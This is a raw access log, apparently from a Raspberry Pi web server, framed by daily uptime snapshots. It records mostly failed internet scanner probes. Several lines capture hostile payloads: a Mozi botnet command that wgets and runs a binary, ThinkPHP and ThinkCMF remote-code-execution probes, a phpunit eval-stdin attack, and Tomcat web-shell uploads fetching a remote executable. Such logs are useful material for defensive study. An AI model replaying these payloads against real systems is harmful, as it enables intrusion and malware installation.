Mon Mar  2 06:25:06 MST 2020
 06:25:06 up 6 days, 11:53,  1 user,  load average: 0.35, 0.24, 0.26
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20  6days  5:54   0.86s /usr/bin/lxsession -s LXDE-pi -e LXDE
192.3.8.162 - - [02/Mar/2020:13:59:12 +0000] "GET / HTTP/1.1" 200 25000 "" ""
80.108.163.21 - - [02/Mar/2020:15:57:48 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
80.108.163.21 - - [02/Mar/2020:15:57:48 +0000] "GET / HTTP/1.1" 200 25000 "" ""
185.234.217.177 - - [02/Mar/2020:15:59:58 +0000] "GET /.git/config HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
165.90.16.5 - - [02/Mar/2020:16:36:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
169.197.108.30 - - [02/Mar/2020:18:25:32 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 "
192.241.217.63 - - [02/Mar/2020:18:38:55 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
219.155.180.19 - - [02/Mar/2020:18:48:43 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 0 "" "Hello, world"
5.235.192.251 - - [02/Mar/2020:18:54:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
54.193.7.54 - - [02/Mar/2020:20:38:12 +0000] "UNKNOWN  HTTP/1.1" 501 0 "" ""
61.219.11.153 - - [02/Mar/2020:20:38:33 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
193.202.44.194 - - [02/Mar/2020:21:21:03 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
193.202.44.194 - - [02/Mar/2020:21:21:03 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
193.57.40.38 - - [02/Mar/2020:23:47:07 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.57.40.38 - - [03/Mar/2020:00:11:59 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
83.97.20.33 - - [03/Mar/2020:00:12:12 +0000] "GET / HTTP/1.0" 200 25000 "" ""
193.57.40.38 - - [03/Mar/2020:00:25:14 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
222.186.19.221 - - [03/Mar/2020:00:29:56 +0000] "UNKNOWN  HTTP/1.1" 400 0 "" ""
124.225.41.229 - - [03/Mar/2020:00:30:09 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
193.57.40.38 - - [03/Mar/2020:00:43:55 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.184.54.16 - - [03/Mar/2020:01:33:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
193.57.40.38 - - [03/Mar/2020:01:40:44 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.188.210.101 - - [03/Mar/2020:02:09:30 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [03/Mar/2020:02:09:37 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [03/Mar/2020:02:09:43 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [03/Mar/2020:02:11:02 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [03/Mar/2020:02:11:09 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [03/Mar/2020:02:11:15 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [03/Mar/2020:02:12:11 +0000] "GET /echo.php HTTP/1.1" 404 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
188.10.238.132 - - [03/Mar/2020:02:20:44 +0000] "GET / HTTP/1.1" 400 0 "" ""
54.149.95.138 - - [03/Mar/2020:02:45:43 +0000] "GET /.env.local HTTP/1.1" 404 0 "" "curl/7.58.0"
49.235.79.40 - - [03/Mar/2020:04:04:46 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
49.235.79.40 - - [03/Mar/2020:04:04:48 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.235.79.40 - - [03/Mar/2020:04:04:48 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.235.79.40 - - [03/Mar/2020:04:04:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
159.203.83.217 - - [03/Mar/2020:04:06:00 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
192.241.224.47 - - [03/Mar/2020:04:19:37 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
185.53.88.15 - - [03/Mar/2020:07:52:41 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
83.0.243.145 - - [03/Mar/2020:08:48:13 +0000] "GET / HTTP/1.1" 400 0 "" ""
108.41.93.122 - - [03/Mar/2020:09:05:22 +0000] "GET / HTTP/1.1" 400 0 "" ""
89.137.176.222 - - [03/Mar/2020:09:09:38 +0000] "GET / HTTP/1.1" 400 0 "" ""
144.217.45.34 - - [03/Mar/2020:09:17:10 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
81.213.150.201 - - [03/Mar/2020:09:47:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
223.149.21.244 - - [03/Mar/2020:09:50:37 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" ""
79.196.118.51 - - [03/Mar/2020:10:17:25 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
81.12.77.144 - - [03/Mar/2020:10:26:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
103.76.14.204 - - [03/Mar/2020:11:37:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
178.73.215.171 - - [03/Mar/2020:11:51:59 +0000] "GET / HTTP/1.0" 200 25000 "" ""
106.52.178.254 - - [03/Mar/2020:12:04:49 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
106.52.178.254 - - [03/Mar/2020:12:04:53 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.178.254 - - [03/Mar/2020:12:04:54 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.178.254 - - [03/Mar/2020:12:04:56 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.178.254 - - [03/Mar/2020:12:04:57 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.178.254 - - [03/Mar/2020:12:04:57 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.178.254 - - [03/Mar/2020:12:04:58 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.178.254 - - [03/Mar/2020:12:04:59 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.178.254 - - [03/Mar/2020:12:05:00 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.178.254 - - [03/Mar/2020:12:05:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
107.6.171.130 - - [03/Mar/2020:12:31:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 "
47.102.219.221 - - [03/Mar/2020:13:03:30 +0000] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 404 0 "http://162.250.19.7:80/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
47.102.219.221 - - [03/Mar/2020:13:03:33 +0000] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 404 0 "http://162.250.19.7:80/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
47.102.219.221 - - [03/Mar/2020:13:03:34 +0000] "PUT /FxCodeShell.jsp/ HTTP/1.1" 404 0 "http://162.250.19.7:80/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
47.102.219.221 - - [03/Mar/2020:13:03:34 +0000] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://ero.bckl.ir/download.exe HTTP/1.1" 404 0 "http://162.250.19.7:80/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://ero.bckl.ir/download.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
Tue Mar  3 06:25:06 MST 2020
 06:25:06 up 7 days, 11:53,  1 user,  load average: 0.38, 0.29, 0.28
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20  7days  6:29   0.86s /usr/bin/lxsession -s LXDE-pi -e LXDE